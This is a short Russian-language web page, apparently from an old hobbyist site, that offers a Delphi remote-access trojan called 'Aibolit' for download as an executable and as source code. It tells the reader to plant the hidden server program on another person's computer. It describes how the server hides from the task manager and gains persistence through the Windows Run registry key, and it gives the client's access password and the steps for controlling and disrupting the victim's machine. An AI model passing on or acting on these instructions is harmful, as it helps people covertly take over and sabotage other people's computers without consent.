<!--#include virtual="/ssi/top.html"-->
<div align="center"><center>

<table width="680" cellspacing="0" cellpadding="0">
  <tr>
    <td><hr>
    <h3>Троянец &quot;Айболит&quot;</h3>
    <p><img src="trojan.gif" width="227" height="175"></p>
    <p>Автор: <a href="http://bezdelnick.by.ru/">Del</a></p>
    <p>Компилятор: Delphi</p>
    <p>С помощью этой проги можно издеваться над чужим
    компом. Прячется от Ctrl-Alt-Del.</p>
    <p>Прога состоит из 2-х частей: клиента(client.exe) и
    сервера(avpmon.exe).<br>
    <br>
    Сервер должен быть скопирован на чужой комп в
    любое место и там запушен. Потом его можно
    удалить.<br>
    <br>
    Сервак скопируеться в <kbd><big>С:\Windows\System</big></kbd>
    (если винды в другом месте он всё равно их найдёт)
    и пропишеться на вражеской педали в автозапуск <kbd><big>(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    - avpmon)</big></kbd>. Он не имеет видимого окна и
    скрываеться от 3-х педалей, так что враг его не
    найдёт.<br>
    <br>
    Теперь на своём компе запускайте client.exe. Кликайте
    Access, вводите пароль: nefart, кликайте Add target, пишите
    там сетевое имя вражеского компа, жмите ok. Все!
    Теперь можете юзать любые команды клиента
    (поверьте мне, 90% этих команд поглючеть вражеский
    комп так, что ни в чате сказать ни в notepad
    написать:), оставшиеся 10% предназначенны для
    администрирования).</p>
    <i><p>Эта прога написана в соавторстве с And[^AmD^] -
    моим одноклановцем</i> </p>
    <p><a href="trojan.rar">Скачать exe-шник (~278Kb)</a> и <a href="ts.rar">исходник
    (~22Kb)</a><br>
    <br>
    <br>
    <br>
    </td>
  </tr>
</table>
</center></div>
<!--#include virtual="/ssi/bottom.html"-->